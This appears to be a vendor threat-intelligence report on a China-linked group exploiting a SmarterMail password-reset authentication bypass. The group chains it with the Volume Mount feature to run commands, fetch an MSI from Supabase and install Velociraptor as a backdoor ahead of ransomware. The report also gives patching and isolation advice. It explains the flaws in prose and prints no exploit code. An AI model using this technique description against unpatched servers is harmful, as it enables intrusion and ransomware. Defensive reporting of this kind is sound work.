Storm-2603 Exploits CVE-2026-23760 to Stage Warlock Ransomware

Editor’s note: This report was authored by Alexa Feminella

Key Points

• ReliaQuest identified activity likely linked to “Storm-2603” involving exploitation of a critical SmarterMail vulnerability (CVE-2026-23760) to bypass authentication and stage “Warlock” ransomware on internet-facing systems.

• The threat actor blends in by abusing legitimate administrative features and deploying legitimate forensic tooling to establish persistence and prepare follow-on actions.

• Defenders should upgrade to SmarterMail Build 9511 or later immediately and strictly isolate mail servers to block lateral movement attempts used to deploy ransomware.

ReliaQuest has identified active exploitation of a vulnerability in SmarterTools SmarterMail email server software (CVE-2026-23760), attributed with moderate-to-high confidence to “Storm-2603.” This appears to be the first observed exploitation linking the China-based actor to the vulnerability as an entry point for its “Warlock” ransomware operations.

While this vulnerability allows attackers to bypass authentication and reset administrator passwords, Storm-2603 chains this access with the software’s built-in “Volume Mount” feature to gain full system control. Upon entry, the group installs Velociraptor, a legitimate digital forensics tool it has used in previous campaigns, to maintain access and set the stage for ransomware.

This activity coincides with a February 5, 2026 CISA warning that ransomware actors are exploiting a second SmarterMail vulnerability (CVE-2026-24423). We observed probes for this second vulnerability alongside the Storm-2603 activity. However, because these attempts originated from different infrastructure, it remains unclear whether Storm-2603 is rotating IP addresses or a separate group is capitalizing on the same window.

Specific attribution matters less than the operational reality: Internet-facing servers are being targeted by multiple vectors simultaneously. Patching one entry point is insufficient if the adversary is actively pivoting to another or—worse—has already established persistence using legitimate tools.

In this report, we:

• Break down the full attack chain, from password reset API exploitation to living-off-the-land persistence.

• Analyze the overlap with CISA’s warning regarding the second vulnerability (CVE-2026-24423).

• Assess why attackers chain administrative features instead of relying solely on direct exploits.

• Provide actionable recommendations to mitigate these vulnerabilities and hunt for pre-encryption indicators of compromise.

Pulling the Thread on Storm-2603

In this section, we unpack the tradecraft observed across the attack chain. Storm-2603 gains entry by exploiting CVE-2026-23760, then pivots to execution by abusing a built-in administrative capability, and finally leans on legitimate forensic tooling to support persistence and reduce suspicion.

By design, email server software is often deployed as internet-facing infrastructure to support webmail and SMTP traffic. That constant exposure makes these systems easy targets for opportunistic scanning and repeated probing. In many cases, there’s little to no obvious lead-up for defenders to spot before exploitation attempts begin.

Initial Access

The attack begins with the exploitation of CVE-2026-23760, which allows the attacker to reset the administrator password through the password reset API. Although the force password reset request does take the target user’s old password as input, vulnerable versions (prior to Build 9511) fail to verify whether that input is correct. This means the system accepts any value, even an incorrect entry, as valid proof of identity.

This allows an unauthenticated attacker to overwrite the credentials of any user, effectively bypassing the entire login process without possessing a single valid credential. While this provides total control over the mail server application, it does not automatically provide the ability to run code on the underlying operating system. To bridge the gap between application control and full system compromise, the attacker must pivot to a secondary technique.

Execution

At this point, the attacker controls the mail software, but they need to control the underlying Windows server to install their backdoor. To bridge this gap between “App Admin” and “System Execution,” the attackers abuse SmarterMail's Volume Mount feature.

This feature is designed to let administrators specify commands for mounting network drives. However, because the application trusts the administrator input, it doesn’t filter what commands can be entered.

Storm-2603 exploits this by injecting arbitrary malicious commands instead of legitimate mount instructions. This is critical because the commands inherit the high-level permissions of the SmarterMail service itself, effectively handing the attacker full administrative control over the server's operating system.

This chaining of the API exploit with Volume Mount abuse highlights the Storm-2603’s sophistication: When the initial vulnerability didn't provide direct remote code execution (RCE), the group leveraged built-in application logic to manufacture it. This specific step is what transforms a data breach into a ransomware staging event, granting the group the ability to download the payloads needed to lock down the network.

Persistence

Once RCE is achieved, the attack pattern aligns perfectly with established Storm-2603 tradecraft. The attackers abuse the Windows Installer (msiexec) to download a malicious payload (v4.msi) from Supabase, a legitimate cloud-based backend platform.

To initiate this download, the attacker relies on the compromised SmarterMail service itself. We observed the legitimate SmarterMail process MailService.exe spawning a command shell (cmd.exe) to execute the request. By piggybacking on these legitimate system processes, the attackers mask the malicious download as routine system activity.

In previous Warlock campaigns, the group relied on GitHub to host Microsoft Installer (MSI) payloads rather than Supabase. The shift to Supabase likely represents a calculated infrastructure rotation: By moving to a fresh, high-reputation domain, they bypass the blocklists and detection logic defenders built against their previous attacks.

Command-and-Control

The MSI file installs Velociraptor, which the attackers configure for command-and-control (C2). Because Velociraptor is a legitimate tool used by security teams, it blends into administrative activity and is less likely to trigger alerts. This establishes a persistent backdoor for the final stage of the attack, creating the conditions for what we assess was highly likely intended to be Warlock ransomware deployment.

Although no ransomware executable was deployed during this attack, the tradecraft matches confirmed Warlock ransomware attacks down to the specific tactics, techniques, and procedures (TTPs), including the usage of MSI installers and using Velociraptor as a C2 tool, indicating that this attack was almost certainly intercepted in the staging phase.

Two Paths to the Same Outcome

During our investigation, we observed ConnectToHub API calls targeting the exploitation methods seen in CVE-2026-24423, the separate vulnerability CISA warned about. These requests originated from infrastructure distinct from the Storm-2603 activity linked to CVE-2026-23760, suggesting the server was likely being tested by multiple threat actors or automated scanning/exploitation tooling in the same time window.

Taken together, the activity shows how these two vulnerabilities converge on a similar outcome. CVE-2026-23760 grants unauthenticated administrative access via the password reset API, which can then be chained with manual abuse of mounting logic to reach code execution. CVE-2026-24423, by contrast, appears to provide a more direct API path to that same execution logic. Because we observed artifacts for both vectors—password resets (confirming the auth bypass) and ConnectToHub calls (consistent with the direct RCE)—it is realistically possible the attacker used the auth bypass as the primary method while multiple other vectors were tested during the same window.

While this may make it hard to discern which vulnerability was really used to stage Warlock, one thing is for sure. The presence of password reset events shows the server accepted the request and executed the reset workflow, confirming successful exploitation of CVE-2026-23760. For CVE-2026-24423, we only observed ConnectToHub API calls, which indicates probing or attempted exploitation but does not, on its own, prove success.

Accordingly, we assess CVE-2026-23760 was the most likely primary access vector, with CVE-2026-24423 reflecting parallel probing or opportunistic exploitation attempts against the same server.

What We Take from This

While CVE-2026-24423 may provide a more direct path to RCE, we are observing active exploitation of CVE-2026-23760 as a multi-step chain that could still culminate in system-level compromise. The fact that attackers are pursuing this workflow suggests it is a viable alternative path to execution—potentially because it can be blended into normal administrative activity. By abusing legitimate features (password resets and drive mounting) instead of relying solely on a single “noisy” exploit primitive, operators may reduce the effectiveness of detections tuned specifically for known RCE patterns.

This pace of weaponization is consistent with ransomware operators rapidly analyzing vendor fixes and developing working tradecraft shortly after release. The tradecraft mirrors that of aggressive groups like “Black Basta,” focusing on rapid lateral movement to escalate from a single compromised server to domain-wide extortion. Given ransomware is the assessed objective, defenders should assume any unpatched, internet-facing SmarterMail instance is being actively targeted.

More broadly, this issue is not unique to SmarterMail. It forms part of a wider trend where adversaries target edge appliances (VPNs, mail servers, or file transfer gateways) to gain an initial foothold, then immediately switch to living-off-the-land tactics to hide their lateral movement. The edge device is the entry point; the larger risk is what attackers can do with legitimate tools and administrative capabilities once inside.

Defenders cannot simply patch the “critical” RCE bug and ignore the authentication bypass. Both pathways can lead to full system compromise, and both are being actively tested by ransomware groups right now.

Step Up Your Defenses Against Emerging Exploitation

Your Action Plan

Storm-2603’s patch-to-exploit speed suggests organizations’ response window is measured in days. Enterprises should patch both CVE-2026-23760 and CVE-2026-24423 as a priority. However, because this attack abuses legitimate tools for persistence, patching alone may not remove an adversary who is already inside. The actions below focus on rapid remediation, limiting lateral movement, and cutting off C2.

• Upgrade Immediately: Upgrade all SmarterTools SmarterMail instances to Build 9511 or later to close the vulnerability gap.

• Isolate the Server: Segment the mail server from the rest of the internal network (DMZ). A compromise of the mail server should not provide a direct path to the domain controller or critical internal assets.

• Restrict Outbound Traffic: Implement strict outbound firewall rules. The mail server should only be allowed to communicate via necessary mail protocols (SMTP, IMAP, POP3). Block all other outbound traffic, specifically to cloud hosting providers or unknown IP addresses, to sever potential C2 channels.

ReliaQuest’s Approach

ReliaQuest GreyMatter equips customers with the tools to quickly detect, contain, investigate, and remediate the TTPs outlined throughout this report, including:

GreyMatter Transit: Unlike traditional tools that rely on post-event analysis, GreyMatter Transit detects attacks in motion by identifying suspicious msiexec activity and unauthorized network connections—such as downloads from unexpected cloud platforms like Supabase—before they are lost in the noise. This enables real-time visibility into living-off-the-land tactics, allowing defenders to disrupt the staging phase before ransomware is deployed.

Agentic AI: After an initial alert—such as a suspicious process spawning from MailService.exe—Agentic AI investigates the entire attack chain. It correlates the initial API exploitation with subsequent system activity, automatically verifying whether tools like Velociraptor were installed. It can then respond by containing the compromised server and generating a complete incident ticket, handling the full incident lifecycle in minutes without waiting for manual analysis.

Detection Rules: ReliaQuest continuously updates detection content to match attacker behavior. Organizations should deploy GreyMatter’s detection rules and Automated Response Playbooks to minimize the risk of compromise from authentication bypass attempts and the abuse of legitimate administrative features to execute malicious code.

IOCs